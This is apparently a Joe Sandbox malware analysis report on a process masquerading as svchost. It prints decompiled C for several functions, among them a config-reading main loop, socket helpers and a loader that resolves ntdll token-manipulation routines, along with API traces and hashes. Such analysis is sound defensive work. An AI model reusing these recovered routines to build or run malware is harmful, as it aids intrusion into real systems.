Part of subcall function 0032EBA0: HeapSize.KERNEL32(00000000,?,0032DB55,7FFF0001), ref: 0032EBB4

GetProcessHeap.KERNEL32(00000000,'2,00000000,0032EA27,00000000), ref: 0032EC41
RtlFreeHeap.NTDLL(00000000), ref: 0032EC48

Strings

'2, xrefs: 0032EC2F, 0032EC37, 0032EC3E

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeSize
String ID: '2
API String ID: 1305341483-1818324287
Opcode ID: ef7db02f6351961d89f6d465497d3081d375b44ebf0acd0bc7b1df852d81b274
Instruction ID: c53a6ffb7b13959740307a818b37f838f27c3ab997fc78000eb068fa6dde533b
Opcode Fuzzy Hash: ef7db02f6351961d89f6d465497d3081d375b44ebf0acd0bc7b1df852d81b274
Instruction Fuzzy Hash: 8BC0123280A2306BC5572750BC5EF9B6B1C9F45711F0A0409F4056A1508760584046E1

Uniqueness

Uniqueness Score: -1.00%

Function 0032E52E, Relevance: 4.6, APIs: 3, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0032E52E(void* __edx, void* __eflags) {
				long _v4;
				void* __ecx;
				void* _t9;
				void* _t11;
				void* _t17;
				long _t20;
				void* _t23;
				int _t24;
				void* _t25;
				void* _t28;
				void* _t32;
				void* _t37;
				void* _t40;
				void* _t44;

				_t44 = __eflags;
				_t32 = __edx;
				E0032DD05();
				_t28 = E0032DBCF(_t44, 0x80000000, 3);
				_pop(_t31);
				if(_t28 == 0xffffffff) {
					L6:
					_t9 = E00322544(0x3328f8, 0x3310d0, 7, 0xe4, 0xc8);
					_t11 = E0032E3CA(_t32, 0x80000001, E00322544(0x3322f8, 0x3310bc, 0x14, 0xe4, 0xc8), _t9); // executed
					_t40 = _t37 + 0x34;
					if(_t11 == 0) {
						_t17 = E00322544(0x3328f8, 0x3310d0, 7, 0xe4, 0xc8);
						E0032E3CA(_t32, 0x80000001, E00322544(0x3322f8, 0x3310a0, 0x19, 0xe4, 0xc8), _t17); // executed
						_t40 = _t40 + 0x34;
					}
					E0032EE2A(_t31, 0x3322f8, 0, 0x100);
					E0032EE2A(_t31, 0x3328f8, 0, 0x100);
					E0032DD69();
					return 1;
				}
				_t20 = GetFileSize(_t28, 0);
				_v4 = _t20;
				if(_t20 != 0) {
					E0032DB2E(_t20);
					_t23 =  *0x3336c4; // 0x0
					_pop(_t31);
					if(_t23 != 0) {
						_t31 =  &_v4;
						_t24 = ReadFile(_t28, _t23, _v4,  &_v4, 0);
						_t48 = _t24;
						if(_t24 != 0) {
							_t25 =  *0x3336c4; // 0x0
							E00322544(_t25, _t25, _v4, 0xe4, 0xc8);
							E0032E332(_t32, _t48,  *0x3336c4, _v4);
							_t37 = _t37 + 0x1c;
						}
					}
				}
				CloseHandle(_t28);
				goto L6;
			}

0x0032e52e
0x0032e52e
0x0032e533
0x0032e544
0x0032e54c
0x0032e553
0x0032e5b8
0x0032e5c7
0x0032e5ed
0x0032e5f2
0x0032e5f7
0x0032e603
0x0032e624
0x0032e629
0x0032e629
0x0032e635
0x0032e63e
0x0032e646
0x0032e653
0x0032e653
0x0032e558
0x0032e55e
0x0032e564
0x0032e567
0x0032e56c
0x0032e571
0x0032e574
0x0032e578
0x0032e583
0x0032e589
0x0032e58b
0x0032e58d
0x0032e59a
0x0032e5a9
0x0032e5ae
0x0032e5ae
0x0032e58b
0x0032e574
0x0032e5b2
0x00000000

APIs

Part of subcall function 0032DD05: GetTickCount.KERNEL32 ref: 0032DD0F
Part of subcall function 0032DD05: InterlockedExchange.KERNEL32(003336B4,00000001), ref: 0032DD44
Part of subcall function 0032DD05: GetCurrentThreadId.KERNEL32 ref: 0032DD53

GetFileSize.KERNEL32(00000000,00000000,?,73B743E0,?,00000000,?,0032A445), ref: 0032E558
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,73B743E0,?,00000000,?,0032A445), ref: 0032E583
CloseHandle.KERNEL32(00000000,?,73B743E0,?,00000000,?,0032A445), ref: 0032E5B2

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
String ID:
API String ID: 3683885500-0
Opcode ID: b70d7cabc97a1717ff1be3ccb9c39ddf4acea02f3cd9ae56ea5617699fe2ae9a
Instruction ID: 46cbc54ba81300cf1f3e3032867f1d9c4f7d4fcac159cf6461ac75d922bb1fe7
Opcode Fuzzy Hash: b70d7cabc97a1717ff1be3ccb9c39ddf4acea02f3cd9ae56ea5617699fe2ae9a
Instruction Fuzzy Hash: 2F21D8B26403207AE6277B22BC87FAB7A1CDF55754F110518FA0AA91D3E955D910C2F1

Uniqueness

Uniqueness Score: -1.00%

Function 0032877E, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 100
sleepCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0032877E() {
				char _v256;
				void* _t16;
				char _t33;
				char* _t36;
				char _t45;
				char _t47;
				void* _t52;
				void* _t53;

				_t52 =  &_v256;
				if(( *0x332f18 & 0x00000001) == 0) {
					 *0x332f18 =  *0x332f18 | 0x00000001;
					 *0x332f14 = E0032F04E(0);
				}
				if(( *0x332f18 & 0x00000002) == 0) {
					 *0x332f18 =  *0x332f18 | 0x00000002;
					 *0x332f10 = E0032F04E(0);
				}
				_t51 = "ip";
				_t49 = "localcfg";
				_t47 = E0032E819(1, "localcfg", "ip", 0);
				_t53 = _t52 + 0x10;
				if(_t47 != 0 && E003226B2(_t47,  &_v256) != 0) {
					E0032E8A1(_t45, 1, _t49, "rresolv",  &_v256);
					_t53 = _t53 + 0x10;
				}
				L7:
				E00328CEE();
				E0032C4D6();
				E0032C4E2();
				_push(0x332118);
				E00322011();
				if(E0032F04E(0) -  *0x332f14 > 0x1e) {
					_t33 = E0032E819(1, _t49, _t51, _t47);
					_t53 = _t53 + 0x10;
					if(_t47 != _t33) {
						if(E003226B2(_t33,  &_v256) != 0) {
							E0032E8A1(_t45, 1, _t49, "rresolv",  &_v256);
							_t53 = _t53 + 0x10;
						}
						_t47 = _t33;
					}
					 *0x332f14 = E0032F04E(0);
				}
				_t16 = E0032F04E(0);
				_pop(_t36);
				if(_t16 -  *0x332f10 >= 0xa) {
					E00328328(_t36, _t45); // executed
					 *0x332f10 = E0032F04E(0);
				}
				Sleep(0x3e8); // executed
				goto L7;
			}

0x0032877e
0x0032878f
0x00328791
0x003287a0
0x003287a0
0x003287ac
0x003287ae
0x003287bd
0x003287bd
0x003287c4
0x003287ca
0x003287d7
0x003287d9
0x003287de
0x003287fe
0x00328803
0x00328803
0x00328806
0x00328806
0x0032880b
0x00328810
0x00328815
0x0032881a
0x00328831
0x0032883d
0x0032883f
0x00328844
0x00328855
0x00328864
0x00328869
0x00328869
0x0032886c
0x0032886c
0x00328876
0x00328876
0x0032887d
0x00328888
0x0032888c
0x0032888e
0x0032889b
0x0032889b
0x003288a5
0x00000000

APIs

Sleep.KERNELBASE(000003E8), ref: 003288A5

Part of subcall function 0032F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0032E342,00000000,73AFF210,80000001,00000000,0032E513,?,00000000,00000000,?,000000E4), ref: 0032F089
Part of subcall function 0032F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0032E342,00000000,73AFF210,80000001,00000000,0032E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0032F093

Strings

localcfg, xrefs: 003287CA, 003287CF, 003287FB, 00328835, 00328861
rresolv, xrefs: 003287F6, 0032885C

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$Sleep
String ID: localcfg$rresolv
API String ID: 1561729337-486471987
Opcode ID: 3d6f502d1b5fbb481a96e3c8183f71ac218decc337da090f6203f19279d24917
Instruction ID: e490a4d5a2fc3137d57f3c0e0119f9d6edb288f6821893b2fb78f1261e147942
Opcode Fuzzy Hash: 3d6f502d1b5fbb481a96e3c8183f71ac218decc337da090f6203f19279d24917
Instruction Fuzzy Hash: F921A8315493316EF317BB657DC7F6B3AACDB44B10F950429F9049D1C3EEA5554081B2

Uniqueness

Uniqueness Score: -1.00%

Function 00324000, Relevance: 4.5, APIs: 3, Instructions: 35
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00324000(CHAR* _a4, signed int* _a8) {
				void* _t3;
				long _t6;
				void* _t8;
				signed int* _t9;

				_t9 = _a8;
				_t8 = 0;
				 *_t9 =  *_t9 | 0xffffffff;
				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
					if(_t3 != 0xffffffff) {
						break;
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) {
						L6:
						return 0;
					} else {
						if(_t6 == 5) {
							L9:
							return 1;
						}
						Sleep(0x1f4);
						_t8 = _t8 + 1;
						if(_t8 < 0xa) {
							continue;
						}
						goto L6;
					}
				}
				 *_t9 = _t3;
				goto L9;
			}

0x00324001
0x00324006
0x00324008
0x0032400b
0x00324021
0x0032402a
0x00000000
0x00000000
0x0032402c
0x00324035
0x00324052
0x00000000
0x0032403c
0x0032403f
0x00324059
0x00000000
0x0032405b
0x00324046
0x0032404c
0x00324050
0x00000000
0x00000000
0x00000000
0x00324050
0x00324035
0x00324057
0x00000000

APIs

CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,003322F8,003242B6,00000000,00000001,003322F8,00000000,?,003298FD), ref: 00324021
GetLastError.KERNEL32(?,003298FD,00000001,00000100,003322F8,0032A3C7), ref: 0032402C
Sleep.KERNEL32(000001F4,?,003298FD,00000001,00000100,003322F8,0032A3C7), ref: 00324046

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: CreateErrorFileLastSleep
String ID:
API String ID: 408151869-0
Opcode ID: 7a05f47b8b99bcb318d46e29907c0ba63f13769c46fd8a15090a6d060b5f15f9
Instruction ID: bdb5b1f44b347b1b147337c898b34353664652e9de926be72efe76d6c57c6e33
Opcode Fuzzy Hash: 7a05f47b8b99bcb318d46e29907c0ba63f13769c46fd8a15090a6d060b5f15f9
Instruction Fuzzy Hash: D2F0A7712401116BD73B4B28BC89B1AB265FB81720F268B24F3B5E60E0C63058C59B14

Uniqueness

Uniqueness Score: -1.00%

Function 0032DB67, Relevance: 4.5, APIs: 3, Instructions: 32
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0032DB67(long _a4, long _a8, CHAR* _a12, CHAR* _a16) {
				char _v264;
				signed int _t13;
				void* _t17;
				CHAR* _t18;
				void* _t19;

				_t13 = GetEnvironmentVariableA(_a12,  &_v264, 0x104);
				if(_t13 == 0) {
					return _t13 | 0xffffffff;
				} else {
					_t18 = _t19 + _t13 - 0x104;
					if( *((char*)(_t18 - 1)) == 0x5c) {
						_t18 = _t19 + _t13 - 0x105;
						 *_t18 = 0;
					}
					lstrcpyA(_t18, _a16);
					_t17 = CreateFileA( &_v264, _a4, 1, 0, _a8, 0x80, 0); // executed
					return _t17;
				}
			}

0x0032db7f
0x0032db87
0x0032dbce
0x0032db89
0x0032db89
0x0032db94
0x0032db96
0x0032db9d
0x0032db9d
0x0032dba4
0x0032dbc2
0x0032dbc9
0x0032dbc9

APIs

GetEnvironmentVariableA.KERNEL32(0032DC19,?,00000104), ref: 0032DB7F
lstrcpyA.KERNEL32(?,003328F8), ref: 0032DBA4
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000080,00000000), ref: 0032DBC2

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: CreateEnvironmentFileVariablelstrcpy
String ID:
API String ID: 2536392590-0
Opcode ID: 1355e7118d75f0c3467170665a704c0137822757447ba5832cbe95d206379b1a
Instruction ID: 73db216a883f3c38cd23d0f3b186f0d3b52c2772b725506cf2f9a1c966df92bf
Opcode Fuzzy Hash: 1355e7118d75f0c3467170665a704c0137822757447ba5832cbe95d206379b1a
Instruction Fuzzy Hash: 92F0BE70100209ABEF26DF64EC99FE93B6DBB14308F2041A4BB91A40E0D7F2D985CF20

Uniqueness

Uniqueness Score: -1.00%

Function 0032EC54, Relevance: 4.5, APIs: 3, Instructions: 24
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0032EC54() {
				long _v8;
				struct _FILETIME _v16;
				signed int _t11;

				GetSystemTimeAsFileTime( &_v16);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
				 *0x3336cc = _t11;
				return _t11;
			}

0x0032ec5e
0x0032ec72
0x0032ec84
0x0032ec89
0x0032ec8f

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0032EC5E
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0032EC72
GetTickCount.KERNEL32 ref: 0032EC78

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Time$CountFileInformationSystemTickVolume
String ID:
API String ID: 1209300637-0
Opcode ID: b7af5a1c19af95ef3a2d2539d53313ab27a585871d55d025c8cef617480607dd
Instruction ID: bc18141447cfc10a3eb7f35a34189542222b4c1626ae828391b8431c591f2325
Opcode Fuzzy Hash: b7af5a1c19af95ef3a2d2539d53313ab27a585871d55d025c8cef617480607dd
Instruction Fuzzy Hash: D0E0BFF5810104BFE70AEBB0DD9EE7B77BCFB08315F500650B911D60A0DA709A048B60

Uniqueness

Uniqueness Score: -1.00%

Function 00321978, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00321978(intOrPtr _a4, signed short _a8) {
				void* _t4;
				void* _t8;

				_t8 = 0;
				_t4 = E0032F428(_a4, _a8 & 0x0000ffff);
				if(_t4 > 0) {
					_t8 = 1; // executed
					__imp__#3(_t4); // executed
				}
				return _t8;
			}

0x00321983
0x00321985
0x0032198e
0x00321991
0x00321992
0x00321992
0x0032199b

APIs

closesocket.WS2_32(00000000), ref: 00321992

Strings

ps, xrefs: 00321992

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: closesocket
String ID: ps
API String ID: 2781271927-3878219058
Opcode ID: 3c3c18a02a1f708af63998a4b9e3c577a43819a48e18aa45ea72764c30e764af
Instruction ID: b06283767374784643f620a074f7888e0d6baaf7d3414e2be078a88d2910fa54
Opcode Fuzzy Hash: 3c3c18a02a1f708af63998a4b9e3c577a43819a48e18aa45ea72764c30e764af
Instruction Fuzzy Hash: AED012361486316A92163759BC1587FAB9CDF45662B11843AFC48C4150D734CC8183D5

Uniqueness

Uniqueness Score: -1.00%

Function 003230B5, Relevance: 3.0, APIs: 2, Instructions: 29
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E003230B5() {
				char _v132;
				char* _t9;
				void* _t14;
				void* _t15;

				E0032EE2A(_t14,  &_v132, 0, 0x80);
				gethostname( &_v132, 0x80); // executed
				_t9 =  &_v132;
				__imp__#52(_t9, _t15); // executed
				if(_t9 == 0) {
					return 0;
				} else {
					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc))))));
				}
			}

0x003230cb
0x003230d8
0x003230de
0x003230e2
0x003230eb
0x003230f9
0x003230ed
0x003230f5
0x003230f5

APIs

gethostname.WS2_32(?,00000080), ref: 003230D8
gethostbyname.WS2_32(?), ref: 003230E2

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostname
String ID:
API String ID: 3961807697-0
Opcode ID: 71af7a5a221755c02b7b432fb2917db56f8d2dff8a5eae62d44a611c071b18a5
Instruction ID: 3cc2b7f4ced1231311e4447537a16c254aa2af676e837a1c52288d622c5ffe24
Opcode Fuzzy Hash: 71af7a5a221755c02b7b432fb2917db56f8d2dff8a5eae62d44a611c071b18a5
Instruction Fuzzy Hash: 54E09B719001299BCF00DBA8EC8AF8B77ECFF04304F084461F905E7250EA34E50487A0

Uniqueness

Uniqueness Score: -1.00%

Function 0032EBCC, Relevance: 3.0, APIs: 2, Instructions: 13
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0032EBCC(long _a4) {
				void* _t3;
				void* _t7;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t3;
				E0032EB74(_t7);
				return _t7;
			}

0x0032ebda
0x0032ebe0
0x0032ebe3
0x0032ebec

APIs

GetProcessHeap.KERNEL32(00000000,00000000,80000001,0032EBFE,7FFF0001,?,0032DB55,7FFF0001), ref: 0032EBD3
RtlAllocateHeap.NTDLL(00000000,?,0032DB55,7FFF0001), ref: 0032EBDA

Part of subcall function 0032EB74: GetProcessHeap.KERNEL32(00000000,00000000,0032EC28,00000000,?,0032DB55,7FFF0001), ref: 0032EB81
Part of subcall function 0032EB74: HeapSize.KERNEL32(00000000,?,0032DB55,7FFF0001), ref: 0032EB88

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateSize
String ID:
API String ID: 2559512979-0
Opcode ID: 420b523a74b81f62c6e735c646ddfb499563ab9aa4e340fd313ebfa564ba49fc
Instruction ID: 05419f34a7c76b5d9084d5697ce6d13d3aea3ef6c9c238355e0ef1dc16d01e8f
Opcode Fuzzy Hash: 420b523a74b81f62c6e735c646ddfb499563ab9aa4e340fd313ebfa564ba49fc
Instruction Fuzzy Hash: 49C08C3BA0C2306BC60727A4BC0DE9A3E9CEF083A2F040004F609C6260CB30484097A2

Uniqueness

Uniqueness Score: -1.00%

Function 0032F43E, Relevance: 1.5, APIs: 1, Instructions: 33networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(000000C8,?,00000000,0032CA44), ref: 0032F476

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 808b97d4cc19f60e15a26f69de2773db461780e45e084fac5651750e0bf0d86e
Instruction ID: 77e0d7f5b72f064b76fd7d2a64420847a7f77475b5c6492d0fec4ca352e3835d
Opcode Fuzzy Hash: 808b97d4cc19f60e15a26f69de2773db461780e45e084fac5651750e0bf0d86e
Instruction Fuzzy Hash: 62F01272201559AF9B12AE5AEC84CAB3BADFB89350B050531FA14D7110D671D8218760

Uniqueness

Uniqueness Score: -1.00%

Function 0032DD84, Relevance: 1.3, APIs: 1, Instructions: 31
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0032DD84(intOrPtr _a4, CHAR* _a8) {
				intOrPtr _t7;
				int _t10;
				intOrPtr* _t12;
				intOrPtr _t13;
				void* _t14;

				_t12 = 0x3320e4;
				_t14 =  *0x3320e4 - 0x3320e4; // 0x804950
				if(_t14 == 0) {
					L6:
					return 0;
				} else {
					goto L1;
				}
				do {
					L1:
					_t7 = _a4;
					_t13 =  *_t12;
					if(_t7 == 0xffffffff ||  *((intOrPtr*)(_t13 + 0xc)) == _t7) {
						if(_a8 == 0) {
							L8:
							return _t13;
						}
						_t5 = _t13 + 0x10; // 0x80000011
						_t10 = lstrcmpiA(_t5, _a8); // executed
						if(_t10 == 0) {
							goto L8;
						}
					}
					_t12 =  *_t12;
				} while ( *_t12 != 0x3320e4);
				goto L6;
			}

0x0032dd8c
0x0032dd8e
0x0032dd94
0x0032ddc5
0x00000000
0x00000000
0x00000000
0x00000000
0x0032dd96
0x0032dd96
0x0032dd96
0x0032dd9a
0x0032dd9f
0x0032ddab
0x0032ddcb
0x00000000
0x0032ddcb
0x0032ddb1
0x0032ddb5
0x0032ddbd
0x00000000
0x00000000
0x0032ddbd
0x0032ddbf
0x0032ddc1
0x00000000

APIs

lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0032DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0032E3A7,000000F0), ref: 0032DDB5

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 308b72c03d4906f03d5b206262daa2df9b69e02a2c5465469f4a219727b7847b
Instruction ID: f061be1de9e9a77debb40bc9381875e41ac0912f92aec5f574faec241c8b819d
Opcode Fuzzy Hash: 308b72c03d4906f03d5b206262daa2df9b69e02a2c5465469f4a219727b7847b
Instruction Fuzzy Hash: 72F0A035200BA2CFCB26CE28B884657B3E8EF85325F16483EE155D3190D730DC49CB11

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00321000, Relevance: 56.2, APIs: 16, Strings: 16, Instructions: 170
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00321000() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				signed int _t4;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				struct HINSTANCE__* _t17;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				struct HINSTANCE__* _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t28;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t31;
				struct HINSTANCE__* _t32;
				struct HINSTANCE__* _t33;
				signed int _t34;
				signed int _t35;

				_t2 =  *0x333918; // 0x0
				_t35 = _t34 | 0xffffffff;
				if(_t2 != 0) {
					L3:
					if( *0x33391c == 0 ||  *0x333920 == 0 ||  *0x333924 == 0 ||  *0x333928 == 0 ||  *0x33392c == 0 ||  *0x333930 == 0 ||  *0x333934 == 0 ||  *0x333938 == 0 ||  *0x33393c == 0 ||  *0x333940 == 0 ||  *0x333944 == 0 ||  *0x333948 == 0 ||  *0x33394c == 0 ||  *0x333950 == 0 ||  *0x333954 == 0) {
						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
						 *0x33391c = _t3;
						if(_t3 == 0) {
							L34:
							_t4 = _t35;
						} else {
							_t5 =  *0x333918; // 0x0
							_t35 = 0xfffffffe;
							_t6 = GetProcAddress(_t5, "RtlSetLastWin32Error");
							 *0x333920 = _t6;
							if(_t6 == 0) {
								goto L34;
							} else {
								_t25 =  *0x333918; // 0x0
								_t35 = 0xfffffffd;
								_t7 = GetProcAddress(_t25, "NtTerminateProcess");
								 *0x333924 = _t7;
								if(_t7 == 0) {
									goto L34;
								} else {
									_t30 =  *0x333918; // 0x0
									_t35 = 0xfffffffc;
									_t8 = GetProcAddress(_t30, "RtlFreeSid");
									 *0x333928 = _t8;
									if(_t8 == 0) {
										goto L34;
									} else {
										_t9 =  *0x333918; // 0x0
										_t35 = 0xfffffffb;
										_t10 = GetProcAddress(_t9, "RtlInitUnicodeString");
										 *0x33392c = _t10;
										if(_t10 == 0) {
											goto L34;
										} else {
											_t26 =  *0x333918; // 0x0
											_t35 = 0xfffffffa;
											_t11 = GetProcAddress(_t26, "NtSetInformationThread");
											 *0x333930 = _t11;
											if(_t11 == 0) {
												goto L34;
											} else {
												_t31 =  *0x333918; // 0x0
												_t35 = 0xfffffff9;
												_t12 = GetProcAddress(_t31, "NtSetInformationToken");
												 *0x333934 = _t12;
												if(_t12 == 0) {
													goto L34;
												} else {
													_t13 =  *0x333918; // 0x0
													_t35 = 0xfffffff8;
													_t14 = GetProcAddress(_t13, "RtlNtStatusToDosError");
													 *0x333938 = _t14;
													if(_t14 == 0) {
														goto L34;
													} else {
														_t27 =  *0x333918; // 0x0
														_t35 = 0xfffffff7;
														_t15 = GetProcAddress(_t27, "NtClose");
														 *0x33393c = _t15;
														if(_t15 == 0) {
															goto L34;
														} else {
															_t32 =  *0x333918; // 0x0
															_t35 = 0xfffffff6;
															_t16 = GetProcAddress(_t32, "NtOpenProcessToken");
															 *0x333940 = _t16;
															if(_t16 == 0) {
																goto L34;
															} else {
																_t17 =  *0x333918; // 0x0
																_t35 = 0xfffffff5;
																_t18 = GetProcAddress(_t17, "NtDuplicateToken");
																 *0x333944 = _t18;
																if(_t18 == 0) {
																	goto L34;
																} else {
																	_t28 =  *0x333918; // 0x0
																	_t35 = 0xfffffff4;
																	_t19 = GetProcAddress(_t28, "RtlAllocateAndInitializeSid");
																	 *0x333948 = _t19;
																	if(_t19 == 0) {
																		goto L34;
																	} else {
																		_t33 =  *0x333918; // 0x0
																		_t35 = 0xfffffff3;
																		_t20 = GetProcAddress(_t33, "NtFilterToken");
																		 *0x33394c = _t20;
																		if(_t20 == 0) {
																			goto L34;
																		} else {
																			_t21 =  *0x333918; // 0x0
																			_t35 = 0xfffffff2;
																			_t22 = GetProcAddress(_t21, "RtlLengthSid");
																			 *0x333950 = _t22;
																			if(_t22 == 0) {
																				goto L34;
																			} else {
																				_t29 =  *0x333918; // 0x0
																				_t35 = 0xfffffff1;
																				_t23 = GetProcAddress(_t29, "NtQueryInformationToken");
																				 *0x333954 = _t23;
																				_t1 = _t35 + 0x10; // 0x100000001
																				_t4 = _t1;
																				if(_t23 == 0) {
																					goto L34;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						return _t4;
					} else {
						return 1;
					}
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x333918 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}

0x00321000
0x00321006
0x0032100b
0x00321023
0x0032102a
0x003210c2
0x003210c4
0x003210cb
0x0032127b
0x0032127b
0x003210d1
0x003210d1
0x003210dc
0x003210e1
0x003210e3
0x003210ea
0x00000000
0x003210f0
0x003210f0
0x003210fc
0x00321101
0x00321103
0x0032110a
0x00000000
0x00321110
0x00321110
0x0032111c
0x00321121
0x00321123
0x0032112a
0x00000000
0x00321130
0x00321130
0x0032113b
0x00321140
0x00321142
0x00321149
0x00000000
0x0032114f
0x0032114f
0x0032115b
0x00321160
0x00321162
0x00321169
0x00000000
0x0032116f
0x0032116f
0x0032117b
0x00321180
0x00321182
0x00321189
0x00000000
0x0032118f
0x0032118f
0x0032119a
0x0032119f
0x003211a1
0x003211a8
0x00000000
0x003211ae
0x003211ae
0x003211ba
0x003211bf
0x003211c1
0x003211c8
0x00000000
0x003211ce
0x003211ce
0x003211da
0x003211df
0x003211e1
0x003211e8
0x00000000
0x003211ee
0x003211ee
0x003211f9
0x003211fe
0x00321200
0x00321207
0x00000000
0x00321209
0x00321209
0x00321215
0x0032121a
0x0032121c
0x00321223
0x00000000
0x00321225
0x00321225
0x00321231
0x00321236
0x00321238
0x0032123f
0x00000000
0x00321241
0x00321241
0x0032124c
0x00321251
0x00321253
0x0032125a
0x00000000
0x0032125c
0x0032125c
0x00321268
0x0032126d
0x0032126f
0x00321276
0x00321276
0x00321279
0x00000000
0x00000000
0x00321279
0x0032125a
0x0032123f
0x00321223
0x00321207
0x003211e8
0x003211c8
0x003211a8
0x00321189
0x00321169
0x00321149
0x0032112a
0x0032110a
0x003210ea
0x0032127f
0x003210ae
0x003210b4
0x003210b4
0x0032100d
0x00321012
0x00321018
0x0032101f
0x00000000
0x00321022
0x00321022
0x00321022
0x0032101f

APIs

LoadLibraryA.KERNEL32(ntdll.dll,00000000,00321839,00329646), ref: 00321012
GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 003210C2
GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 003210E1
GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 00321101
